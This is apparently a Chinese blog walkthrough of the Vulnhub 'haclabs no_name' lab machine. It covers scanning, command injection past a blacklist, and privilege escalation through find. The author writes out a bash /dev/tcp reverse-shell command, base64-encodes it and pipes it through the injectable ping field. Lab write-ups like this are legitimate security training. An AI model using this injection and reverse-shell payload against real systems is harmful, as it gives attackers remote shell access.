Vulnhub靶机no_name渗透

最新推荐文章于 2022-10-11 15:42:33 发布
最新推荐文章于 2022-10-11 15:42:33 发布
阅读量384 收藏 1
点赞数
文章标签: 安全 kali linux 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xingjinhao123/article/details/114437787
版权

靶机介绍
官方下载地址:http://www.vulnhub.com/entry/haclabs-no_name,429/
靶机获取shell比较难,提权比较容易,一共有三个flag在用户的家目录里面,需要在virtualbox运行,网络设为桥接
在这里插入图片描述
运行环境
靶机:网络设为桥接,IP地址:192.168.1.91
攻击机:同网段下的kali linux,IP地址:192.168.1.37
开始渗透
运行靶机
在这里插入图片描述
获取靶机IP地址
在这里插入图片描述
扫描端口及其服务
在这里插入图片描述
看到只开放了一个80端口,扫一下目录
在这里插入图片描述
在这里插入图片描述
开始访问得到的目录
80端口的首页,不管输入啥都回显Fake ping wxecuted
在这里插入图片描述
admin是一个宣传页面,
在这里插入图片描述
superadmin.php是一个命令执行的页面
在这里插入图片描述
查看superadmin.php页面的源码,发现有黑名单过滤
在这里插入图片描述
目录分隔符被过滤了可以将反弹shell的命令使用base64加密之后再执行
源代码:bash -i >& /dev/tcp/192.168.1.37/4444 0>&1
加密之后:YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMzcvNDQ0NCAwPiYx
kali开启监听之后,执行命令127.0.0.1|echo “YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMzcvNDQ0NCAwPiYx”|base64 -d|bash
在这里插入图片描述
监听成功,查看你所有用户
在这里插入图片描述
有三个用户在yash用户的家目录下找到了flag1.txt
在这里插入图片描述
提示haclabs用户的密码在隐藏文件当中,查看yash用户的所有文件
在这里插入图片描述
查看隐藏文件passwd
在这里插入图片描述
知道haclabs用户的密码,使用su切换到haclabs用户
在这里插入图片描述
在haclabs用户的家目录里面找到了flag2.txt
在这里插入图片描述
使用sudo提权,或者查看usid
在这里插入图片描述
haclabs用户在find的用户组里面
查看find的提权命令
在这里插入图片描述
成功找到flag3.txt
在这里插入图片描述
成功找到所有flag,这个靶机就完成了!

Sword-豪
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
构建完善的安全渗透测试环境:推荐工具、资源和下载链接
weixin_43263566的博客
02-14 3620
安全渗透环境准备(工具下载)
haclabs: no_name(HL.ova)靶机渗透-Vulnhub
m0_68117643的博客
07-16 1368
这台靶机(haclabsno_name)仅开放了1个80端口,目录扫描时尽可能使用多个工具和字典,以便尽可能多的收集信息。 突破点:目录扫描(注意字典和参数)——命令执行(注意payoad)—切换用户(注意优化终端)——find提权......
Vulnhub靶机:HACLABS_ NO_NAME
LainWith的博客
02-06 3102
目录介绍信息收集主机发现主机信息探测网站探测目录扫描命令执行反弹shellFlag2Flag1搜寻隐藏文件提权-Flag3参考 介绍 系列: haclabs(此系列共3台) 发布日期:2020年2月15日 难度:初级-中级 Flag : 3个,每个Flag都存在与特定用户的家目录 学习: 目录扫描 命令执行 find提权 靶机地址:https://www.vulnhub.com/entry/haclabs-no_name,429/ 信息收集 主机发现 netdiscover主机发现 对于VulnHub
渗透测试-Lampiao靶机渗透
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
04-13 516
1.环境部署 靶机下载地址:https://download.vulnhub.com/lampiao/Lampiao.zip 攻击机:Kali 2019 靶机 : Lampiao 目标:拿下靶机root权限和里面的flag 2.信息搜集 使用arp-scan -l进行局域网主机发现,确定目标靶机IP为192.168.72.132 使用NMAP扫描目标靶机开发的端口 nmap -sS -p 1-65535 192.168.72.132 -n 发现存在一个ssh服务,和2个web服务 对两个web服务进
metasploitable2 渗透测试靶机 1
最新发布
m0_73910867的博客
10-11 1734
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。这个版本的虚拟系统兼容VMware。当虚拟系统启动之后,使用用户名:msfadmin 和密码msfadmin登陆 适用于学习网络安全
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
渗透测试新手练习及高手深入挖掘专用Linux及Windows靶机(官方原版镜像)
05-08
本人学习时使用的的这两个系统,常见的高风险漏洞较多,容易利用,适合新手练习。 metasploitable-linux为常用的Linux靶机,系统包含了很多高风险漏洞、弱口令及容易利用的端口、服务,是渗透测试初学者练习技术的不二之选。 Windows_xp_pro_with_sp2就更不用说了,都被人挖烂了,sp2版本相比sp3更简单一些,适合新手练习。
2020最新渗透测试靶机和工具及教程
05-30
搜集的渗透测试的靶场,有Bwapp综合靶场练习 webug综合靶场练习 DVWA综合靶场练习 pikachu靶场练习 uploads文件练习 SQlilabs注入练习 ZVulDirll综合靶场,全部封装在虚拟机中,渗透工具封装在另一虚拟机中。
渗透测试 靶机环境下载
zhyuxue的博客
09-09 1330
下载Linux应用程序虚拟机、Windows下载、metasploit下载。
Vulnhub靶机haclabs:deception1.1渗透
xingjinhao123的博客
09-05 707
靶机介绍 官方下载地址:https://www.vulnhub.com/entry/haclabs-deception11,440/ 靶机有三个flag,第一个flag是下载靶机镜像压缩包的密码,第二个flag在yash用户的家目录里面,第三个flag在root目录下 运行环境 靶机:网络设为桥接模式,IP地址:192.168.1.114 攻击机:同网段下的kali linux,IP地址:192.168.1.115 开始渗透 获取解压密码 将官网提示的字符串使用十六进制解码之后得到密码 将靶机运行起来
DC-5靶场下载及渗透实战详细过程(DC靶场系列)
金 帛的博客
07-30 2784
dc-5靶场详细渗透过程
渗透测试学习之靶机DC-5
xdbzdgx的博客
11-18 5639
1.下载靶机 本篇文章是DC靶机系列的第五篇,针对的是靶机DC-5,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章。 DC-5的下载地址为DC: 5 ~ VulnHub。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。 同样地,DC-5只有一个flag。 在VMware加载成功之后显示如下界面: 默认状态我们是打不开该系统的,也不知道账号密码的,毕竟我们的目的就是在不知道账号密码的情况下拿到roo.
渗透测试学习之靶机napping-1.0.1
xdbzdgx的博客
04-30 1174
前期准备 1.下载靶机Napping-1.0.1WebGOAT: 1 ~ VulnHub 1.载入vmware,网络模式设置为NAT kali IP地址为192.168.88.128 靶机 IP地址为192.168.88.129 一 、信息收集 1.使用nnamp扫描器扫描开放的端口 nmap -T4 -sV -p- 192.168.88.129 发现开放了80端口和22远程控制端口 2.寻找web信息 访问后发现需要登录,随即注册账号并登录。 此处..
Funbox1:noname靶机渗透练习
Winsudo的博客
12-23 2806
funbox系列靶机练习
安全狐】靶机渗透_bulldog(附下载靶机地址)
安全狐
12-23 3688
目录 渗透测试の信息收集 一、主机发现 二、端口扫描(masscan/nmap) 三、端口服务 四、扫描子域名 五、渗透ing 六、反弹shell,提权 总结 靶机下载地址: 链接:https://pan.baidu.com/s/1UrPkBqoM-AshTiKOZCPRww 提取码:aqhu 渗透测试の信息收集 ( ip 系统信息 端口号 端口对应的服务 服务对应版本 子域名 whois c段 旁站等 ) 一、主机发现 方法1 nmap -sn 192.168.1...
Vulnhub靶机渗透环境搭建及JIS-CTF入门实践
Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一) 在这篇文章中,我们将学习如何搭建Vulnhub靶机渗透环境,并学习JIS-CTF入门知识,以及蚁剑提权示例。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sword-豪

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值